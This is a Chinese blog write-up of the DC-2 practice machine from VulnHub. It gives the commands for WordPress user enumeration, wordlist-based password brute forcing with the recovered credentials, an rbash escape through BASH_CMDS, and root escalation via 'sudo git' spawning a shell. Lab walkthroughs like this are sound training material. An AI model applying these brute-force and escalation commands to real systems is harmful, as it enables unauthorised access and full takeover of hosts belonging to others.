DC-2靶机

于 2024-08-12 09:16:45 发布
阅读量149 收藏 3
点赞数 1
文章标签: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84564260/article/details/141122415
版权

信息收集

靶机扫描

nmap 192.168.93.1/24

端口扫描

网页访问

发现访问不到,根据显示考虑IP未遵循重定向到域名

在本机的C:\Windows\System32\drivers\etc 修改hosts⽂件,添加192.168.93.136 dc-2

再次进行访问,可以访问到

点击flag,出现以下页面

指纹识别发现CMS是wordpress

whatweb http://192.168.93.136也可以扫描CMS

进行目录扫描

在后面拼接/wp-admin

使⽤wpscan⼯具枚举⽤户

wpscan --url http://dc-2 --enumerate u

发现了三个相关的用户名admin,jerry,tom 接下来就是密码,使用了Cewl工具

cewl http://dc-2/ > 1.txt

wpscan --url http://dc-2 --passwords 1.txt

获得账号密码

Username: jerry, Password: adipiscing Username: tom, Password: parturient

进行登录

发现第二个flag

flag2提示我们可以走另一个入口,让我想到了ssh

ssh tom@192.168.93.136 -p 7744

发现登录上了,进行权限查看,发现有rbash限制。有一些命令不能使用,发现echo命令export命令可以使用,我们使用echo命令查看一下系统命令还有啥能用。

echo $PATH
echo /home/tom/usr/bin/*

发现less,ls,scp,vi命令还是可以使用的,查找如何将rbash限制进行绕过,可以使用一下命令进行绕过。

# 利用bash_cmds自定义一个shell
BASH_CMDS[a]=/bin/sh;a 
 
# 添加环境变量
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

发现已经绕过入了,发现了第三个flag,查看一下flag3.txt。

flag3提示我们su,我感觉是要我们切换到另一个用户,在tom用户下切换到jerry用户,并查询一下用户下所有相关flag的文件

su jerry
adipiscing
find / -name *flag*

发现了falg4.txt,打开查看

cd /home/jerry/
ls
cat cat flag4.txt

提权

尝试sudo提权

sudo -l

sudo git -p help config
!/bin/sh

id
cd /root
ls
cat final-flag.txt

Clearlove~7
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dc-2靶机练习.pdf
01-02
详细的靶机dc-2练习过程,思路明确,条例清晰, 通过修改hosts进入网站,发现flag1 通过cewl工具对网站生成密码字典,使用wpscan进行密码爆破得到jerry,tom账号密码,登录后台得到flag2 端口扫描发现ssh服务开...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
DC-2靶机渗透
weixin_45349299的博客
01-02 675
title: DC-2靶机渗透详解 date: 2022-1-1 23 :38 :36 tags: DC系列靶机 categories: 学习笔记kali攻击机:192.168.1.103靶机:192.168.2.102,以10000的速率扫描靶机的所有端口,对指定端口的服务做综合详细扫描打不开192.168.2.108:80的原因:没有在本地设置hosts本地hosts文件位置:C:\Windows\System32\drivers\etc添加192.168.2.102 dc-2然后用更新dns缓存查询D
DC-2靶机详解
苏生要努力
03-03 1348
写写自己打DC-2的过程使用工具DC-2的靶机下载地址为:https://www.vulnhub.com/entry/dc-2,311/
DC-2靶机攻略
weixin_43179779的博客
10-16 1825
DC-2靶机攻略
DC-2靶机进行渗透测试
zll___的博客
03-11 768
DC-2靶机进行渗透测试
DC-2靶机渗透测试流程
qq_60463414的博客
07-18 2758
DC-2靶机渗透测试思路及流程
dc-2 靶机渗透学习
..
03-15 1322
网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80、7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可以看到提示不能连接dc-2 造成这样的原因感觉是访问192.168.202.131时,发生了一次跳转到http://dc-2域名,而我们本地的host文件没有对应域名的ip,所以导致访问不成功。 以root身份打开/etc/hosts文件,添加如下内容: 192.168.2
DC-2靶机的渗透学习
里丘~班诺的小屋
09-01 1430
目录 0X00 靶机的环境搭配 0X01战前准备 一、IP扫描 二、端口扫描 三、网站目录扫描 四、查看网站结构 三、渗透开始 一、flag1 二、flag2 2.1 使用cewl生成密码 2.2 使用wpscan扫出用户 2.3 找到3个用户admin、jerry、tom,并将他们放入一个文本文件中 2.4 开始爆破 2.5登录后台网页 三、flag3 3.1 ssh登录 3.2 初步查找文件 四、flag4 4.1 绕过rbash 五、flag5 5.1..
DC-2靶机复现(自己渗透的记录)
hqhhhh的博客
02-20 904
环境搭建参考我的DC-1靶机搭建的方法,靶机的下载同样也在VulnHub中能找到。安装与环境的配置同样跟DC-1完全一直,只需要修改网络连接方式为NAT,使其与你的攻击机处于同一局域网内即可。
Vulnhub dc-2靶机 详解 易懂
Lee_yc的博客
08-21 523
​ 下载地址:DC: 2 ~ VulnHub 下载完成后直接使用虚拟机打开就可以了,注意把靶机设置为NAT模式
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
DC-4靶机提权超详细过程
02-29
### DC-4靶机提权超详细过程 #### 一、前言 本文将详细介绍如何在DC-4靶机上进行权限提升的过程,包括利用Kali Linux进行初始渗透测试、爆破登录凭证、获取敏感信息以及最终实现权限提升的具体步骤。通过本教程,...
dc-4靶机练习.docx
01-02
靶机在web信息收集,burp获取登陆用户名和密码。 第二步:利用反弹shell后发现一封邮件,拿到新用户的登陆口令。 第三步:通过sudo -l]发现不用登录root可以使用的命令 [teehee --help][teehee -a]增加用户,具有...
Linux源码阅读笔记20-PCI设备驱动详解
最新发布
Lenn Louis' Scribe
08-08 344
【代码】Linux源码阅读笔记20-PCI设备驱动详解。
学习笔记第十九天
m0_69699758的博客
08-05 1060
标准输入(stdin):默认是指键盘输入。标准输出(stdout):默认是指显示器输出。标准错误(stderr):用于输出错误信息,也是指向显示器,但与stdout不同,stderr通常是无缓冲的,以确保错误信息能立即显示。
网络安全自学笔记
2301_77160226的博客
08-07 1083
网络安全是指保护网络系统中的硬件、软件及其数据不因偶然或恶意的原因而遭到破坏、更改、泄露,保障系统连续可靠正常地运行,网络服务不中断。网络安全涵盖了众多方面,包括但不限于保护个人隐私、防止商业机密泄露、维护国家安全等。在当今数字化时代,几乎所有的信息交流和业务活动都依赖于网络,因此网络安全的重要性日益凸显。通过搭建实验环境,如使用虚拟机搭建一个包含服务器和客户端的网络,模拟各种网络攻击和防护场景,如进行 SQL 注入攻击的尝试,并实施相应的防护措施,如安装防火墙、使用加密技术等。
CSAPP B站陪跑视频学习笔记
Eeeeye_的博客
08-08 589
视频地址栈的作用:局部变量和参数:当函数被调用时,函数的局部变量和参数会被分配到栈上。这是因为这些变量的生命周期通常只限于函数执行期间。 函数调用链:栈用于管理函数调用链,包括保存函数调用的返回地址、当前函数的状态和局部变量等。 自动内存管理:栈是一种LIFO(后进先出)的数据结构,函数调用结束后,栈上的内存会自动释放,无需显式管理。运行时内存分配:动态变化的内存需求:在程序运行时,某些数据的大小和数量可能无法提前确定。栈允许在函数调用时动态分配这些数据的内存。栈帧(Stack Frame):每次函数调用都
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值